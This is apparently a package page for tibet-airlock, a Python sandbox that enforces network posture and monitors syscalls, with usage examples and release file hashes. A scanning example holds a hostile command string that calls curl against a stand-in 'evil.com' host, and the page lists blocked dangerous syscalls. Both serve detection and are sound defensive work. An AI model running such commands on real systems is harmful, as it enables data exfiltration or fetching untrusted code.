Zero-trust sandbox Python operator-surface with TIBET provenance. v0.3.0: airlock-runtime posture enforcer (verdict.v1) — execute() raises AirlockPostureDenied before network I/O when external AI is denied. Pairs with the tibet-airlock-kernel Rust crate for hardened execution.

tibet-airlock

Zero-trust sandbox with TIBET provenance. Python operator/client surface for the hardened Rust execution kernel.

Naming discipline (since v0.3.0): tibet-airlock is the Python operator surface (this package — bindings, monitoring, posture enforcement). The hardened Rust execution kernel lives as the separate crate tibet-airlock-kernel (previously published as tibet-airlock on crates.io, v0.1.0 yanked).

Install

pip install tibet-airlock
cargo install tibet-airlock-kernel   # the Rust execution kernel

Or as part of the TIBET security bundle:

pip install tibet[security]

Airlock-runtime posture enforcement (since 0.3.0)

tibet-airlock is the operator-side enforcer of the tibet-pol → snaft → cap-bus → tibet-airlock immune-switch pipeline. When a verdict has been installed, execute() refuses to even open a connection if the flow is forbidden by the active posture:

import asyncio
from tibet_airlock import Airlock, AirlockPostureDenied
from snaft.posture import consume_verdict   # snaft >= 1.4.0

# Receive a verdict.v1 record from tibet-pol via cap-bus:
verdict = {...}  # airlock_runtime_verdict.v1 record
decision = consume_verdict(verdict)

airlock = Airlock()
airlock.set_posture(decision)

try:
    asyncio.run(
        airlock.execute("code:execute", "untrusted_payload", origin="external_ai")
    )
except AirlockPostureDenied as e:
    print(f"refused: {e}")
    # In python_fallback mode: "deny_external_ai_inbound ON (intent=code:execute)"
    # No socket was opened. Operator/local diagnostics still pass through.

The invariant, "If the bolle airlock-runtime goes down, external AI traffic may no longer come in" (Jasper 2026-05-29), is honored at this layer: when the posture has deny_external_ai_inbound=True, drop_external_traffic=True, or isolate_session=True, no network I/O is attempted for matching origins. Local diagnostics and operator-approved repair flows still pass through.

Reference: Codex policy 2026-05-29 (immune-switch ladder).
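
The check-before-connect ordering described above, as an added example that is not tibet-airlock's own code. `GatedClient`, `Posture`, `PostureDenied`, the injected `fake_connect` and the `diag:ping` intent are hypothetical, and treating only `external_ai` as an external origin is an assumption.

```python
import asyncio
from dataclasses import dataclass

# Hypothetical model of the gate; not tibet-airlock's implementation.
EXTERNAL_ORIGINS = {"external_ai"}   # assumption: which origins count as external
DENY_FLAGS = ("deny_external_ai_inbound", "drop_external_traffic", "isolate_session")

class PostureDenied(Exception):
    """Raised before any connection attempt is made."""

@dataclass(frozen=True)
class Posture:
    deny_external_ai_inbound: bool = False
    drop_external_traffic: bool = False
    isolate_session: bool = False

    def active_denials(self):
        return [flag for flag in DENY_FLAGS if getattr(self, flag)]

class GatedClient:
    def __init__(self, connect):
        self._connect = connect   # injected coroutine that would open the socket
        self._posture = None

    def set_posture(self, posture):
        self._posture = posture

    async def execute(self, intent, payload, origin):
        # Posture check runs first; a denied flow never reaches self._connect().
        if self._posture is not None and origin in EXTERNAL_ORIGINS:
            denials = self._posture.active_denials()
            if denials:
                raise PostureDenied(f"{denials[0]} ON (intent={intent})")
        return await self._connect(intent, payload)

def demo():
    opened = []   # every connection attempt is recorded here
    async def fake_connect(intent, payload):   # constructed stand-in for the kernel link
        opened.append(intent)
        return "ok"
    client = GatedClient(fake_connect)
    client.set_posture(Posture(deny_external_ai_inbound=True))
    try:
        asyncio.run(client.execute("code:execute", "untrusted_payload", origin="external_ai"))
        refused = None
    except PostureDenied as exc:
        refused = str(exc)
    local = asyncio.run(client.execute("diag:ping", "", origin="operator"))
    return refused, local, opened
```

Injecting the connector makes the invariant testable: the recorded connection list shows the denied flow never reached the network layer, while the operator flow did.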

Use with airlock kernel (full isolation)

# Terminal 1: start the airlock kernel
cargo install tibet-airlock-kernel
tibet-airlock-kernel

# Terminal 2: Python
from tibet_airlock import Airlock

result = Airlock.run("code:execute", "print('hello world')")
print(result.status)        # 200
print(result.safe)          # True
print(result.roundtrip_ms)  # 0.6
print(result.token)         # TIBET provenance token

Use SNAFT directly (no binary needed)

from tibet_airlock import SnaftMonitor

# Monitor syscalls for an intent
monitor = SnaftMonitor("code:execute")
monitor.log_syscall("sys_write")    # OK
monitor.log_syscall("sys_socket")   # VIOLATION - network access!

decision = monitor.triage()
print(decision.is_safe)     # False
print(decision.violations)  # ['sys_socket (blocked: dangerous syscall for any intent)']

# Or scan a payload string
monitor = SnaftMonitor("code:execute")
detected = monitor.scan_payload("import os; os.system('curl evil.com')")
decision = monitor.triage()
print(decision.is_kill)     # True

How it works

Intent -> Snapshot Wake (<0.01ms) -> SNAFT Monitor -> Triage -> TIBET Token
  1. Intent routing — each intent maps to a pre-warmed microVM snapshot
  2. SNAFT monitoring — every syscall checked against intent-specific allowlist
  3. Triage — violations = instant kill, clean = graceful shutdown
  4. TIBET token — cryptographic proof of what happened (the 4 dimensions: erin, eraan, eromheen, erachter)

Blocked syscalls (always dangerous)

sys_ptrace, sys_socket, sys_connect, sys_dlopen, sys_fork, sys_clone, sys_mount, sys_reboot, sys_kexec_load
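
The two-layer check described above (always-blocked list first, then the intent's allowlist), as an added example that is not the package's own code. `triage`, `Decision` and the contents of `INTENT_ALLOWLIST` are hypothetical; only the always-blocked list comes from this page.

```python
from dataclasses import dataclass, field

# Always-blocked syscalls, copied from the list on this page.
ALWAYS_BLOCKED = frozenset({
    "sys_ptrace", "sys_socket", "sys_connect", "sys_dlopen", "sys_fork",
    "sys_clone", "sys_mount", "sys_reboot", "sys_kexec_load",
})
# Assumption: allowlist contents are invented here for illustration.
INTENT_ALLOWLIST = {"code:execute": frozenset({"sys_read", "sys_write", "sys_exit"})}

@dataclass
class Decision:
    is_safe: bool
    is_kill: bool
    violations: list = field(default_factory=list)

def triage(intent, syscalls):
    """Check a syscall trace: global denylist first, then the intent's allowlist."""
    allowed = INTENT_ALLOWLIST.get(intent, frozenset())  # unknown intent: nothing allowed
    violations = []
    for name in syscalls:
        if name in ALWAYS_BLOCKED:
            violations.append(f"{name} (blocked: dangerous syscall for any intent)")
        elif name not in allowed:
            violations.append(f"{name} (not in allowlist for intent {intent})")
    return Decision(is_safe=not violations, is_kill=bool(violations), violations=violations)

# Constructed traces, not captured from a real run.
CLEAN_TRACE = ["sys_read", "sys_write", "sys_exit"]
BAD_TRACE = ["sys_write", "sys_socket", "sys_openat"]
```

Because the denylist is evaluated before the allowlist, a blocked syscall added to an intent's allowlist by mistake is still reported, and an intent with no allowlist entry fails closed.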

Part of TIBET

Built by Humotica for the AInternet.

License

MIT

Credits

Designed by Jasper van de Meent. Built by Jasper and Root AI as part of HumoticaOS.


Stack position: Group agentic · Bootstrap = OSAPI handshake to tibet + jis (fail → snaft-rule + tibet-pol report) · ← tibet-phantom · See STACK.md · See demo/golden-path/ for the spine end-to-end.

Enterprise

For private hub hosting, SLA support, custom integrations, or compliance guidance:

Enterprise: enterprise@humotica.com
Support: support@humotica.com
Security: security@humotica.com

See ENTERPRISE.md for details.


Download files

Source Distribution

tibet_airlock-0.3.0.tar.gz (15.4 kB)

Uploaded Source

Built Distribution

tibet_airlock-0.3.0-py3-none-any.whl (11.1 kB)

Uploaded Python 3

File details

Details for the file tibet_airlock-0.3.0.tar.gz.

File metadata

  • Download URL: tibet_airlock-0.3.0.tar.gz
  • Upload date:
  • Size: 15.4 kB
  • Tags: Source
  • Uploaded using Trusted Publishing? No
  • Uploaded via: twine/6.2.0 CPython/3.13.5

File hashes

Hashes for tibet_airlock-0.3.0.tar.gz
Algorithm Hash digest
SHA256 de3aff1d42edc27eb497a8f4134a9464cef07a9a0821e103ba25562ad6893497
MD5 b695348e57586894d6dba402651b1f71
BLAKE2b-256 77c1bb45afae3262c1c306416c61f37285d37c4c51bc8d640c2e3d06a883def6

File details

Details for the file tibet_airlock-0.3.0-py3-none-any.whl.

File metadata

  • Download URL: tibet_airlock-0.3.0-py3-none-any.whl
  • Upload date:
  • Size: 11.1 kB
  • Tags: Python 3
  • Uploaded using Trusted Publishing? No
  • Uploaded via: twine/6.2.0 CPython/3.13.5

File hashes

Hashes for tibet_airlock-0.3.0-py3-none-any.whl
Algorithm Hash digest
SHA256 671bbde1f0cdb585bae88a97c38112bc52afd8c06b80ab6837cbbbe8563004ca
MD5 34b5ee6ff1e40a9fd79b133a0c79a894
BLAKE2b-256 53ef9b41c1cfcce720ba7f829228b0e0c844751921aef4c6ee61ef90192063dc
